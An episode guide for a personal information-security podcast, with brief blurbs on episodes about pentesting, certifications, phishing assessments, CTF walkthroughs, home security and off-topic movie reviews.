Full episode guide

Below is a blurb on each podcast episode, a link to show notes where applicable, and an embedded MP3 for your listening pleasure!

1: Epic Introduction

In this episode, I talk about the inspiration behind the 7MS podcast and my vision for it going forward. (Admittedly, my ulterior motive is to use this intro episode to figure out how in the heck to get this podcast submitted and visible on iTunes :-).

View this episode's show notes for more information.

2: The Importance of Logging and Alerting

In this episode I talk about how a client of ours learned a hard lesson: that the lack of logging/alerting makes for a pretty miserable investigation after they were breached.

View this episode's show notes for more information.

3: Patch Strategies: Part 1

Here are some strategies for getting patching done the right way.

View this episode's show notes for more information.

4: Patch Strategies: Part 2

In this episode I continue talking about some dos and donts of patch strategies – this time talking about enterprise level gear.

View this episode's show notes for more information.

5: Fun Firewall Rules - part 1

In this episode I talk about some basic firewall rules that many organizations don’t have in place.

View this episode's show notes for more information.

6: Fun Firewall Rules - part 2

In this episode I continue talking about some basic firewall rules that many organizations don’t have in place.

View this episode's show notes for more information.

7: External Vulnerabilities that Byte

In this episode I talk about external network vulnerabilities that we see in many of our assessments – some of which are pretty easy to clear up.

View this episode's show notes for more information.

8: CISSP - Is That the Cert for Me?

All about the CISSP certification, what it covers, how to study for it, and how to pass it!

View this episode's show notes for more information.

9: Information Security for the Whole Family

A chat about sharing passwords with your spouse and how you should probably make home network production changes after hours :-).

View this episode's show notes for more information.

10: Information Security for the Whole Family - part 2

In this episode I talk more about some infosec-y things I’m doing on the home front to nurture a security culture (if you will) with my wife and kids.

View this episode's show notes for more information.

11: Overtraining your iPhone Touch ID

In this episode I totally throw my subscribers for a loop and do a VIDEO podcast about overtraining your Touch ID on your iPhone.

View this episode's show notes for more information.

12: Why My Domains Have Gan to Gandi

In this episode I talk about an account takeover article that freaked me out, and why it changed a few things about how I handle my important online accounts.

View this episode's show notes for more information.

13: How to Get Pwned by HP

In this episode I talk about how I had to sent my HP laptop in for repair and, to my surprise, it (allegedly) came back with a bonus: malware!

View this episode's show notes for more information.

14: H8 4 Win 8 (audio)

In this episode I talk about two (sort of) security related tips that I’ve learned by using Windows 8 wrong.

View this episode's show notes for more information.

15: PwnPad Initial Impressions

In this episode I talk about my initial impressions of using the PwnPad for wireless pentesting.

View this episode's show notes for more information.

16: PwnPad Initial Impressions - part 2!

In this episode I talk about my first-hand experience using the PwnPad for wireless pentesting.

17: How to Pass the Certified Ethical Hacker Exam

In this episode I share my experience with EC-Council’s Certified Ethical Hacker training and exam.

View this episode's show notes for more information.

18: Wireless Security 101

In this episode I talk about some wireless security basics that we’re not seeing when out on assessments.

View this episode's show notes for more information.

19: Kioptrix! (audio)

In this episode I talk about a deliciously vulnerable series of VMs called Kioptrix, and how you can use them to sharpen your pentesting skills.

View this episode's show notes for more information.

20: Moving from GoDaddy to DNSimple (audio)

In this episode I talk about why I’m pulling my domains from GoDaddy, and making DNSimple their new home.

View this episode's show notes for more information.

21: OSCP - Part 1

In this episode I talk about my venture into Offensive Security and the OSCP certification!

22: Black Squirrel

This episode is about using Black Squirrel for phishing campaigns.

View this episode's show notes for more information.

23: OSCP - Part 2

Part 2 of the OSCP series, focusing on how you need to make sure you document everything as you go!

24: Why Wireless Scares Me

This episode is all about why you should (probably not) use wireless hotspots, and keeping yourself safe in general when surfing the Web.

25: Writing Better Pentest Reports

This episode talks about some pointers, tools and tips towards writing better pentest reports.

26: The Importance of Training and Awareness

This episode talks about one topic I’m particularly passionate about. I call it “How not to click on bad stuff.”

27: Backing Up with Crashplan

This is a NON-endorsed/sponsored episode about my personal favorite backup service called CrashPlan.

28: Infosec for Kids?

This is more of a random, wondering aloud type of episode as I think about raising my kids with infosec in mind.

29: Follow Up Then!

This isn’t necessarily related to security, but it’s about one of my favorite tools to keep my todos organized: FollowUp Then!

30: Managing Privileged Accounts

Most organizations I talk to have no idea where their privileged accounts are used across the network. I recently saw a demo of a solution called CyberArk, which seems to address that problem.

31: Network Detective

Network Detective is a tool we’ve been using as kind of an addendum to our full security assessment. It gives some nice, plain-English Excel spreadsheets and Word docs that report on AD health and structure, PC inventory and open ports, AV clients that aren’t working right, and a whole lot more.

32: OSCP - Part 3

An obvious (hopefully) tip that will save you a ton of time.

34: The Hacker Playbook

I found a great bit of reading that walks you through the “plays” of hacking – enumeration, exploitation, post-exploitation, etc. It’s a great (and affordable) book called The Hacker Playbook.

35: OSCP - Part 4

More about the challenging, rage-inducing OSCP training experience.

36: OSCP - Part 5

More OSCP discussion goodness.

37 - Keimpx

Ever wanted to pass hashes a whole network at a time? Check out this episode, where I talk about one of my fav new tools called Keipmx.

38: OFFTOPIC - Health and Infosec

Every once in a while I thought it would be fun to go slightly off topic and talk about other stuff I’m interested in. This episode kind of has a tech twist though. I talk about how I use my iPhone and a few apps to stay at least a little bit in shape.

39: Infosec on the Disney Boat

I took a Disney cruise with my family recently, and one particular aspect of the trip gave me the Big Brother heebie-jeebies.

40: OSCP - Part 6

Yep, OSCP continues to kick my butt. I hope this episode helps it kick yours less.

41: OSCP – Part 7

Tired of talking about OSCP yet? Me neither!

42: Vulnerability Scans vs. Pentests

I think everybody throws around the terms “vulnerability scans” and “pentests” and they mean completely different things from one person to the next. In this episode I try to explain the difference (in my mind, anyway).

43: Why Web Site Vulnerability Scanners Can Ruin Your Day

Did you know that Web site vulnerability scanners can destroy your customer sites? If not, listen to this.

44: OFFTOPIC – Annoying People at the YMCA

Warning, this is an off topic episode! Did you know it’s fun to stay at the YMCA? Did you also know it’s fun to annoy annoying people at the YMCA? Listen to this episode to find out why.

45: OFFTOPIC – Why I Stopped Pirating Software

Warning, this is an off topic episode! I used to pirate software. There. I admitted it. But it’s funny how a letter from the Comcast legal dept. will make someone want to stop pirating software forever, immediately.

46: So You Want to Be a Hacker?

So you want to be a hacker? Cool. In this episode I toss myself under the bus and share why I used to have a really dumb perspective on what that meant, and how my view of hackers has changed dramatically.

47: Logging and Alerting RELOADED

Hey, you should log the stuff going on in your network. This episode talks about that (again). And I reference some AD-related settings that may not be enabled in your environment.

48: So I Gave My Eight Year Old a Computer

Is it a good idea to give young kids a computer to play with? Maybe. Maybe not. Tune in to today’s episode and weigh in!

49: OSCP – The Final Chapter – part 1!

We’ve arrived at the exciting two-part finale to my bloody battle with the OSCP!

50: OSCP – The Final Chapter – part 2!

At last, the epic conclusion of the maddening, redeeming OSCP journey.

51: CEH vs. OSCP

A few people have written in asking whether to pursue the CEH or OSCP (or both). This episode discusses my experience with each cert and hopefully points you in the right direction on which one might be right for you.

52: OFFTOPIC – My Son is Really Loyal

It’s another off-topic episode today. This one’s about how my eight-year-old son is fiercely loyal, and wants to settle a 25-year-old score for me.

53: Are You Ready to Get Robbed?

Business DR plans are a hugely important – and often overlooked – piece of the infosec puzzle. But what about at home? If you got run over by a bus tomorrow, would you have good backups and DR in place?

54: Traveling with a Red Giant

If you’re concerned about your credit/debit card security, you might want to give Red Giant a try. It’s a service that provides a debit card you can unlock only when actively buying things, and lock whenever you're not.

55: OFFTOPIC – What’s in Brian’s Murse?

Ok I don’t really have a murse, but I wanted to do a short video(!) podcast to show you some sorta-security-related gadgets that I’ve been nerding out on the last few weeks.

56: OFFTOPIC – Catching Up and Blowing Noses

A few offtopic things: What you can expect as far as a podcast release schedule going forward Two suspicious charges that showed up on my credit card while out of town!

57: How to Review a Firewall

n this episode I talk about a few different ways to approach firewall reviews/audits. This document was very helpful in getting my template started. Also check out Nipper if you’re looking for a good automated tool.

58: What Should We Do First?

At the end of just about every assessment I deliver, the client asks “What should we do first?” They (understandably) want to know a “top 5″ list of things they should change right away to improve their security posture.

59: Traveling with a Red Giant – Part 2

A few episodes back I talked about Red Giant, a cool service that provides you with a pre-paid debit card that can be controlled/locked with your phone. I finally got my card working, and this episode is about some cool things I learned about it.

60: How Not to Suck at Customer Service

This episode was inspired by two awesome customer service experiences I had in the past week. It got me thinking: how can we as infosec professionals suck less with our customer service approach?

61: Why Local Admin Rights Suck

Users running as local admins on their machine are a big risk! This episode discusses some reasons why, and also here is the link to the Avecto study I mention regarding how many Microsoft vulnerabilities would be thwarted by removing admin rights.

62: You Should Run LAPS

Microsoft has released a tool called Local Administrator Password Solution to help administrators manage local admin credentials for domain-joined machines. Check out this article for more information, and please contact me if you end up running this, as I’d love to hear about your experience.

63: I’m Excited to Go Phishing

This week I’ll be launching a phishing campaign against an organization that has been well trained to defend against such malicious attacks and links! Will this organization break my company’s 100% success rate for phishing, or will I be able to craft an email to fool at least one person?

64: Wifi Sniffing is Fun - Part 1

I got a fun project involving wireless sniffing, followed up by scraping through packets looking for credit card data! Here’s part 1, which talks about about software/hardware you might need to do this the right way.

65: OFFTOPIC - Still Alice

Warning, this episode is off topic and has NOTHING to do with infosec! Nope! Instead, it’s a review of the movie Still Alice.

66: I’m Excited to Go Phishing – Part 2

This is a follow-up to episode #63, discussing the results of a fun phishing campaign I recently completed.

67: Wifi Sniffing is Fun - Part 2

This is a follow-up to episode #64, in which I did some fun wireless sniffing and tried to find sensitive data within it! In the episode I talk about the network “map” of my sniffing setup.

68: Is Training and Awareness Worth It or Worthless?

This episode is about something that got my undies in a bunch – I heard a security expert imply that training and awareness might be worthless!

69: I’m Not Responsible for Your Information Insecurity

Are you too hard on yourself? Do you think the success of your client’s infosec program lives and dies with you? Listen to this episode. You might feel better.

70: Get the Most out of Your DNS!

I’m pumped to talk about an about an awesome, free little tool that made my Internet connection feel like new again.

71: OFFTOPIC - Mad Max

We’re going totally off topic today and doing a movie review of Mad Max!

72: PCI Pentesting 101

I’m pumped to talk about an about an awesome, free little tool that made my Internet connection feel like new again.

73: PCI Pentesting 101 – Part 2

This episode is the exciting continuation of a recent pentest I did, in which I got some serious pwnage, including cracking the domain admin password!

74: How to Become a More Organized Information Security Professional

In this episode I share some strategies and apps that may help you stay more organized as you go about your infosec work!

75: OFFTOPIC - My Son's Piano Recital

I wanted to share (what I think is) an amusing anecdote about my son's first piano recital, which was topped off by a kid playing the song "Lucky." Many LOLs commenced for me.

76: Lessons Learned from LastPass

I know this is a bit late, but I wanted to talk a little about the LastPass breach and why I'll still remain a customer.

77: OFFTOPIC - Rickrolling Your Coworkers for Fun and Profit

This week i used my Wifi Pineapple to scare and amuse my coworkers and lure them into a Rickroll trap. All the gory details in today's episode!

78: It's All About Segmentation

In this episode I advocate for proper network segmentation, as doing it (well and right!) can seriously reduce your risks!

79: My Love/Hate Relationship with Nessus

In this episode I talk about one of my favorite vulnerability scanners, Nessus, and why I want to simultaneously hug it and punch it in the neck.

79.5: UPDATE(!) on My Love-Hate Relationship with Nessus

In episode #79 I shared some gripes about Nessus. Those gripes were quickly answered by Tenable staff/support so I wanted to pass relevant updates on to you!

80: OSWP - Part 1

This episode kicks off a multi-part series all about the OSWP (Offensive Security Wireless Professional) certification.

81: OSWP - Part 2

A continuation of our thrilling, exciting, mind-blowing series on OSWP (Offensive Security Wireless Professional)!

82: OSWP - Part 3

The OSWP series is coming to a close. One final episode today and then the four-quel episode will be all about the test!

83: Wifi Pineapple First Impressions

In this episode I talk about my first hands-on experience with a Wifi Pineapple, and why you'll probably want one too.

84: DIY Pwn Pad

Hey have you heard of Pwn Pads? They're an awesome network pentesting tool that leverages a Nexus tablet - which you can either buy right from Pwnie Express, or create your own if you have a certain model of Nexus lying around. I just happened to have the right Nexus model around, so this podcast episode chronicles my trial and error (mostly error) in making a DIY Pwn Pad!

P.S. to get the Android tools installed on Ubuntu 14.04, run these commands:

sudo add-apt-repository ppa:nilarimogard/webupd8sudo apt-get updatesudo apt-get install

85: What is The Penetration Testers Framework (PTF)?

Need an easy way to create a modular/mobile kit of pentest tools to take with you from machine to machine? And ALSO be able to update all those modules in one command? Then check out the PTF! That's what we're talkin' about on today's podcast.

86: OSWP-The Final Chapter!

This episode concludes the gripping, thrilling, exciting, awesome-ing, death-defying, unsettling, rattling series on OSWP (Offensive Security Wireless Professional). Specifically, I talk (as much as I can without getting into trouble) about the exam and give you some pointers to pass it!

87: Presenting the Right Findings to the Right Audience

Today I talk about challenge I run into when I'm delivering to a mixed audience of C-level folks and IT people. How do you keep things high level enough so everybody "gets it" but also go level enough that the recommendations have some teeth?

88: Glasswire

This episode's about a cool security app called GlassWire, which is (kind of) a firewall on steroids. I love it! Oh, and this is not an endorsement or a commercial :-)

89: AppSpider

Today we're talking about a new (to me) Web site/app scanning tool called AppSpider by Rapid7. Again, this isn't a commercial or paid advertisement. I just like sharing things that I like and use.

90: OFFTOPIC - Citizenfour

We're going offtopic today and talking about the Citizen Four documentary, which centers around the Edward Snowden story.

91: Umbrella

Today's episode is about Umbrella, a product from OpenDNS that provides a layer of protection against malware, wifi-jacking and other threats.

92: You're Not Ready for Big Boy Security Pants

Sometimes I get in situations where clients want their WHOLE security program reviewed, but in reality, they are still in the baby steps phase. What's the right thing to do when, for lack of a better term, the client isn't ready to put on their security big boy points?

93: Securing Your Life

So yeah, this is kind of off-topic, but have you thought about security in the sense of "What kinds of security things should I be doing before I'm dead?" Today's episode explores that.

94: Learn How to Burp - Part 1

I've been looking for better ways to learn Burp Suite and I struck gold! Check out my recommendations in today's episode!

95: How to Make Friends During a Security Assessment

When you start a security assessment with a company, not everybody's gonna be glad to see you. The IT dept and other employees may have tense shoulders, thinking that this is an Office Space situation where they're interviewing for their jobs. This episode talks about some ways you might be able to get your assessment off to a right start.

96: How to Make Enemies During a Security Assessment

Yep, we're talking about how to make ENEMIES during a security assessment today (and maybe turn them into friends).

97: OFFTOPIC - Limbo

We're going off topic today and talking about video games! LIMBO for the Xbox!

98: Intro to PCI Scoping

So far I've focused on the technical aspects of PCI, but I'm trying to get familiar with the overall scoping questions that my tenacious QSA friends ask when they start a gap analysis. This episode shares some interesting tidbits I learned while doing some QSA "shadowing" on an assessment of a restaurant.

99: How to Deliver Bad News in a Good Way

Today's episode gives you some tips on how to deliver bad news in an assessment in a positive way. I think that last sentence was a grammatical nightmare.

100: Assessment Curses Can Be Blessings

Ever had an assessment that you thought would be the death of you? I had one recently, but after sticking it out, it turned out to be a blessing in disguise.

101: OFFTOPIC - I Am Chris Farley

The new(ish) Chris Farley documentary is fantastic - see it!

102: Recon-ng!

I'm a big fan of Recon-ng and you should be too! Check it out - and learn more about Tim Tomes, its creator - at www.lanmaster53.com. And here's the video I mentioned in the podcast - my first look at Recon-ng in action:

103: OFFTOPIC - I Was in a Movie Once

This is an off-topic episode about the time I was in the holiday comedy super-smash laugh-fest, Jingle All the Way.

104: LANTurtle First Impressions

Hey I just got a LANTurtle and....these are my first impressions!

105: OFFTOPIC - Big Bag of Random Sauce

Today's totally random episode covers: 1. How bad does this podcast's logo suck? 2. Does this podcast need a theme song? 3. Some interesting training I'm taking next week. 4. The Walking Dead - who should die? 5. Metal Gear Solid and my personal godmode strategy.

106: A Day in the Life of an Information Security Analyst

A listener wrote in asking some questions about "a day in the life of" a security analyst, so here's my best stab at it!

107: I'm Going to PWAPT!

Hey I'm going to PWAPT this week (http://www.eventbrite.com/e/practical-web-application-penetration-testing-with-tim-tomes-lanmaster53-tickets-16718889649), so in this episode I talk about that...and how I'll probably be too info-overloaded to record anything on Thursday :-). Oh, and I had a fun Web app pentest this week that I wanted to share some fun bits on.

108: I'm Going to PWAPT! - Part 2

Here's part 2 (of probably several to come) about my experience with PWAPT (Practical Webapp Pentesting) training last week!

109: OFFTOPIC - It Follows and Backcountry

Movie reviews of It Follows and Backcountry.

110: Hacking WPA Enterprise - Part 1

This episode is about my experience hacking WPA enterprise. Huge mega tiger uppercut thanks to this site for giving me the fixes I needed to get this working on Kali2!

111: Hacking WPA Enterprise - Part 2

The thrilling (?) conclusion of my experience hacking WPA Enterprise.

112: This is Sparta!

This episode is about one of my favorite enumeration tools called Sparta - it's built right into Kali 2. And maybe it was in Kali 1 and I totally missed it. But whatevs. I'm happy to have found it now!

113: Big Bag of Random Security Stuff

Yep, this episode is EXACTLY what the title implies.

114: PCI Pentesting 101 - Part 3

Part 3 on my series about PCI pentesting. Yeah. That.

115: OFFTOPIC - Love and Mercy

We're going off-topic today and talking about the new(ish) movie about Brian Wilson's life called Love and Mercy.

116: Tips for a Succesful Vulnerability Scan

In this episode I complain about getting stuck in NY for two days, and also how to efficiently scan for vulnerabilities when your time is crunched.

117: OFFTOPIC - Alive Inside

Today I talk about one of the most moving films I've ever seen - a documentary called Alive Inside.

118: Should Phishing be Fair?

This episode discusses an important and rhetorical (to me) infosec question: Should phishing campaigns be "fair?"

119: Migrating from Tumblr to Ghost - Part 1

In this episode I talk about my adventures in moving my brianjohnson.tv Tumblr content over to a Digital Ocean hosted droplet running Ghost. I think you'll want to check this episode out, because in part 2 I talk about the challenges I faced in hosting multiple Ghost instances on one DI droplet. I will also be talking about how to enable CloudFlare SSL (for free!) as well as enabling Fail2Ban to keep annoying people/IPs from brute forcing your SSH root account!

View this episode's show notes for more information.

120: The Purge!

Announcing the 7MS PURGE! I've got a back log of episodes banked and I want to get caught up for the new year. So I'm going to release one (or maybe more) episodes per day between now and 2016. Plus (spoiler alerts!) in 2016 we're moving to a Monday/Wednesday/Friday release schedule. Yep, 7MS three times a week - thanks for the idea, mom!

View this episode's show notes for more information.

121: Migrating from Tumblr to Ghost - Part 2

Part 2 concludes my journey in moving 7ms.us from Tumblr to a Digital Ocean droplet running Ghost. Here are the key resources mentioned during the podcast: How to run multiple Ghost blogs on one DI VPS. The key takeaway here was that I had to upgrade to the $10 droplet (I did a "flexible" resize to add more proc/memory) and then the second instance of Ghost installed fine. Turning on CloudFlare SSL was easy. I chose flexible SSL since I wasn't using a "real" cert. I also wrote a rule to force HTTPs for all connections.

View this episode's show notes for more information.

122: OFFTOPIC-An Apology to Elephants

This episode is about a documentary called An Apology to Elephants. It's all about the treatment (or mistreatment) of elephants, and the main message of the movie is, "Please don't go to the circus when it's in town, because you're supporting elephant abuse." Even if that message was a little heavy handed, I certainly will pass on tickets next time a circus act comes through town.

View this episode's show notes for more information.

123: Doing a "Redo" Assessment

This episode talks about my experience in doing a "redo" security assessment, during which I struggled with the following questions: what's the best way to efficiently correct the erroneous information and make the customer happy without asking ALL the original questions over again? Especially when I have little to no time to prepare for the "redo" interview?

View this episode's show notes for more information.

124: Sprinkles

This episode is 90% a rant about how annoying carry-on luggage and air travel can be, and a 10% sprinkling of security sauce mixed in. Hence: sprinkles.

View this episode's show notes for more information.

125: Securing Your Life - Part 2

Way back in episode #93, I talked about things you can do to secure your life (mortgage review, adequate insurance, estate planning, investments, etc.). This episode continues that train of thought and covers: getting the right amount of life insurance, getting the right home/auto coverage, as well as estate planning.

View this episode's show notes for more information.

126: Get Your Name Out There

This episode isn't about infosec exactly, but it talks about how using public resources like LinkedIn, Twitter and blogs to boost your "brand" (though I hate that word) and help you get more connected to the infosec community, job leads and more!

View this episode's show notes for more information.

127: Intro to HIPAA Assessments

This episode covers a few HIPAA tidbits I picked up while preparing for - and executing - a HIPAA security assessment.

View this episode's show notes for more information.

128: Transparency is King

In this episode, I talk about a restaurant infosec assessment I did, and how the recommendations coming out of that assessment didn't fit the standard "mold." I also talk about how being transparent and helpful - and NOT billing clients for every tiny little thing - is king.

View this episode's show notes for more information.

129: Embarrassing Stories

In this episode I talk about face-planting in my office at the first job I had out of college.

View this episode's show notes for more information.

130: Sqlmap and Sqlninja FTW

This episode talks about some fun I had using sqlmap, and how using it in conjunction with Sqlninja makes me happy to be alive.

View this episode's show notes for more information.

131: How to Attempt a Two Week Pentest in Two Days

The title says it all. I had two days to pentest a network that probably would've taken two or more people two weeks or more. I laughed. I cried. I had fun.

View this episode's show notes for more information.

132: I Got a New Job - Part 1

This is a four-part series about my transition to a new job! The topics are as follows: Part 1: When it may be time to look for a new job (or not) Part 2: How to stand out during phone screenings and interviews Part 3: How to gracefully transition from old job to new job Part 4: Here's what I'm doing in my new gig!

View this episode's show notes for more information.

133: I Got a New Job - Part 2

This is a four-part series about my transition to a new job!

View this episode's show notes for more information.

134: I Got a New Job - Part 3

This is a four-part series about my transition to a new job!

View this episode's show notes for more information.

135: I Got a New Job - Part 4

This is a four-part series about my transition to a new job!

View this episode's show notes for more information.

136: Python for Newbs

One skill that's been kind of a hinderance in my IT/security career is I have exactly zero experience in programming/coding. Zero. Zip. Nil. Nada. Nothing.. But I'm trying to remedy that in 2016 by learnin' me some Python, and I picked up a great book called Python Crash Course, which has been exactly what this newb needed. At the time of publishing, you can get 30% off with the coupon code CRASHCOURSE!

View this episode's show notes for more information.

137: OFFTOPIC - Welcome to Leith

This off-topic episode talks about one of the most gripping and disturbing documentaries I've ever seen. Welcome to Leith, in a nutshell, asks the question: What would you do if a white supremacist group moved in next door?

View this episode's show notes for more information.

138: OFFTOPIC - The Hateful Eight

Looks like I'm one of the few people in the world who did NOT love this movie. I found it painful slow and claustrophobic. #disappointed.

View this episode's show notes for more information.

139: Securing Your Life - Part 2

Back in episode #93 I talked about securing your life - in other words, asking yourself "What would happen if I was dead right now? Do I have adequate insurance? Are my finances in order? How about estate planning?" This episode continues that train of thought, and I share some new changes I've made in my "life security" department.

View this episode's show notes for more information.

140: OFFTOPIC - Video Games I'm Currently Playing

This episode talks about some cool video games I've been playing lately: * Metal Gear Solid Phantom Pain (Xbox 360) * Rise of the Tomb Raider (Xbox 360) * Luminocity (iPhone) * Super Mario Maker (Wii U) I recommend 'em all!

View this episode's show notes for more information.

141: Happy (Belated) New Year!

Happy (belated) new year! This episode is more of a "What am I listening to, a PBS telethon?!" kind of thing, and I'm sorry for that. But I want to cover: * Scheduling changes for 2016 - we're gonna be 3 times a week! * A new documentation project I'm working on called BPATTY (Brian's Pentesting and Technical Tips for You) * A way you can support the podcast financially.

View this episode's show notes for more information.

142: OFF-TOPIC - Media Servers and Making a Murderer

This off-topic episode covers: * Media servers - I'm a newb in this area and could use your help in setting up a config that actually works! * Making a Murderer - this is a fantastic show!

View this episode's show notes for more information.

143: Friday Infosec News and Links Roundup

View this episode's show notes for more information.

144: Shoulder-Surfing with Seasoned Pentesters

I recently had the opportunity to shoulder-surf with some seasoned Webapp pentesters, and wanted to share what I learned about their tools, techniques and methodologies.

View this episode's show notes for more information.

145: OFF-TOPIC - Sicario and The Walk

In today's off-topic episode I review two movies: Sicario and The Walk.

View this episode's show notes for more information.

146: Friday Infosec News and Links Roundup

View this episode's show notes for more information.

147: DIY Hosted Mutillidae

In this episode I talk about how to build a cheap hosted Mutillidae server to safely hack away on while keeping other Internet prowlers out.

View this episode's show notes for more information.

148: OFF-TOPIC - Apple Watch Review

Yep, there are tons of people/blogs/magazines/children/pets who have provided reviews of the Apple Watch. This is mine.

View this episode's show notes for more information.

149: Securing Your Life - Part 3

This episode continues the series on securing your life - making sure all the security stuff related to your life is in order. Today we're particularly focusing on preparing to travel. What if (God forbid) the plane goes down? Who has access to your money, passwords, etc.?

View this episode's show notes for more information.

150: OFFTOPIC-Bone Tomahawk / Goodnight Mommy / Comedy Loves Misery

View this episode's show notes for more information.

151: Friday Infosec News and Links Roundup

View this episode's show notes for more information.

152: Review of the Almond 2015 Wireless Router

This is a mini-review of the Almond 2015 router by Securifi. This is NOT a paid advertisement or endorsement.

View this episode's show notes for more information.

153: Ex Machina (and special musical guest)

Today's episode is a movie review of Ex Machina (how the FRICK do you pronounce that?) and closes out with special musical guest, Sweet Surrender!

View this episode's show notes for more information.

154: Friday Infosec News and Links Roundup

View this episode's show notes for more information.

155: Million Dollar Pentest Idea, Notepad Tricks and LL Bean Jackets for Dogs

Things discussed today:

  • We could make 1 million dollars if we made a tool that could correlate data from all the popular pentesting tools.
  • The differences in vuln descriptions between AppSpider and Nexpose really grind my gears!
  • My parents' dog wears a 50 dolalr LL Bean jacket - wha?

View this episode's show notes for more information.

156: OFF-TOPIC - 3 Ways to be a More Connected Parent

I never thought working from home would make it harder to transition to "home time" when the clock strikes 5 p.m. Today's episode discusses 3 ways I'm trying to be a more connected parent.

View this episode's show notes for more information.

157: Infosec News and Links Roundup

View this episode's show notes for more information.

158: Pentesting in a Vacuum

How do you keep 20 Kali boxes setup with Metasploit Pro and updated without any access to the Internet? Carefully, I guess :-). In today's episode I talk about some of those challenges, as well as progress made thus far.

View this episode's show notes for more information.

159: OFF-TOPIC - What Size Company is Right for Me? (and a review of the Steve Jobs movie)

People have been writing in asking if they should work in a huge company or a small consulting/IT shop. I think they both have their pros and cons, but in this episode I attempt to oversimplify the decision with this question: How many hats do you want to wear?

View this episode's show notes for more information.

160: Infosec News and Links Roundup

View this episode's show notes for more information.

161: DIY Wifi Network Graphing & Dojo Scavenger Vulnerable Webapp

Back in episode 157 I mentioned talked about a great article that walks you through using Kali to create a map of the wifi networks around you. I had a need to go through this exercise over the weekend, so here's my condensed walkthrough.

View this episode's show notes for more information.

162: OFF-TOPIC - Deadpool

This episode is a mini review of DEADPOOL! I had a huge reservation about Deadpool before seeing it, but the film squashed it...and has restored my faith in the superhero franchises! I give it an A!

View this episode's show notes for more information.

163: Infosec News and Links Roundup

View this episode's show notes for more information.

164: Pentesting in a Vacuum - Part 2

This is a continuation of episode #158, in which I described my challenges in creating a 20-server Kali environment with no Internet access.

View this episode's show notes for more information.

165: DIY Podcast

Well, my first choice for topic today (DIY retro gaming console) fell through (ARGH!) so today I chat about another topic people ask about: what tools/services go into making a podcast. Here's my setup in a nutshell.

View this episode's show notes for more information.

166: Infosec News and Links Roundup

View this episode's show notes for more information.

167: My Misadventures with SOAP Web Services

TLDR: Before I'd do another SOAP Web services test, I'd ask (demand) the following from the dev team:

  • WSDLs for all services in scope
  • SoapUI project file populated with valid request for each Web service (so I can distinguish responses and app behavior).

View this episode's show notes for more information.

168: Upgrading and Securing Your Digital Ocean Ghost Blog

This weekend, while I was comforting my barfing son, I did some securing and tune-up work on this blog, which is a Ubuntu Digital Ocean droplet running on the Ghost blogging platform. Here's the spit and polish that was applied.

View this episode's show notes for more information.

169: Infosec News and Links Roundup

View this episode's show notes for more information.

170: Pentesting in a Vacuum - Part 3

This weekend I was tasked with pentesting a subset of a few specific hosts, and also running some scenarios such as "An attacker has a presence on one of the machines, what can he do to further grab creds/info and use that to escalate permissions/privs in the environment?"

View this episode's show notes for more information.

171: OFF-TOPIC - Easter Music

This is probably the most off-topic of all off-topic episodes - in that the topic isn't really a topic at all. Instead, I offer up two of my favorite worship songs to get us in an Easter mindset for the weekend. Have a listen.

View this episode's show notes for more information.

172: Infosec News and Links Roundup

View this episode's show notes for more information.

173: DIY SSH Honeypot with Kippo

Interested in having some fun with Kippo (an SSH honeypot) on your Digital Ocean server? Here's a super fast getting started guide.

View this episode's show notes for more information.

174: DIY SSH Honeypot with Kippo - Part 2

In this episode I took my Kippo installation to the next step by incorporating mysql.

View this episode's show notes for more information.

175: Infosec News and Links Roundup

View this episode's show notes for more information.

176: DIY SSH Honeypot with Cowrie

Recently I covered the Kippo SSH honeypot and a few folks brought to my attention that this project was a little long in the tooth, and had been superseded by Cowrie. So this episode focuses on Cowrie!

View this episode's show notes for more information.

177: A Not Totally Sucky Way to Backup and Share Photos

In this episode I talk about a not completely sucky way to backup and share photos seamlessly (almost) from multiple phones.

View this episode's show notes for more information.

178: Infosec News and Links Roundup

View this episode's show notes for more information.

179: Bring New Life to an Old Mac with OSX Server

In this episode I talk about how I took my aging Mac Mini and gave it some reasons to live! By installing a 20 dollar app you can make your old Mac cache software updates, host Time Machine network backups, become a DHCP/DNS server, push iPad policies and more!

View this episode's show notes for more information.

180: Vulnhub Walkthrough - Skydog CTF

The following is a semi-spoilerish walkthrough of the Skydog CTF VM from Vulnhub by James Bower.

View this episode's show notes for more information.

181: Infosec News and Links Roundup

View this episode's show notes for more information.

182: Vulnhub Walkthrough - SickOs

The following is a semi-spoilerish walkthrough of the SickOs VM from Vulnhub by D4rk.

View this episode's show notes for more information.

183: OFFTOPIC-The Invitation

A movie review of The Invitation.

View this episode's show notes for more information.

184: Infosec News and Links Roundup

View this episode's show notes for more information.

185: Vulnhub Walkthrough - Lord of the Root

The following is a semi-spoilerish walkthrough of the Lord of the Root VM from Vulnhub by KookSec.

View this episode's show notes for more information.

186: OFFTOPIC - Reviews of Brooklyn and The Revenant

Today's off-topic episode contains two mini movie reviews Brooklyn and The Revenant.

View this episode's show notes for more information.

187: Infosec News and Links Roundup

View this episode's show notes for more information.

188: Vulnhub Walkthrough - DroopyCTF

The following is a semi-spoilerish walkthrough of the DroopyCTF VM from Vulnhub by Knightmare.

View this episode's show notes for more information.

189: OFFTOPIC - Reviews of The Family Fang and Tumbledown

Today's off-topic episode features two mini movie reviews: The Family Fang and Tumbledown.

View this episode's show notes for more information.

190: Infosec News and Links Roundup

View this episode's show notes for more information

191: Vulnhub Walkthrough - Kevgir

This is a semi-spoilerish walkthrough of the Kevgir VM from Vulnhub by canyoupwn.me.

View this episode's show notes for more information

193: News and Links Roundup

View this episode's show notes for more information

194: Vulnhub Walkthrough - Simple

The following is a semi-spoilerish walkthrough of the Simple VM from Vulnhub by @RobertWinkel.

View this episode's show notes for more information

195: Why AppSpider is Grinding My Gears

This episode is why AppSpider is grinding my gears right now. I have found a site that, when scanned, will cause AppSpider to go ka-blooooey!

View this episode's show notes for more information

196: News and Links Roundup

View this episode's show notes for more information

197: Vulnhub Walkthrough - SickOS 1.2

The following is a semi-spoilerish walkthrough of the SickOS 1.2 VM from Vulnhub by @D4rk36.

View this episode's show notes for more information

198: Two Pretty Cool Pentest Stories

  • One about finding a XXE vuln in a popular commercial product.

  • One about an employee who did a Webapp pentest on a product as it was being pitched to him

View this episode's show notes for more information

199: News and Links Roundup

View this episode's show notes for more information

200: Vulnhub Walkthrough - Milnet

The following is a semi-spoilerish walkthrough of the Milnet VM from Vulnhub by @teh_warriar.

View this episode's show notes for more information

201: OFF-TOPIC - Audio Clip Extravaganza

In this first ever 7MS audio clip extravaganza, I offer the following two mini-journeys for your ears:

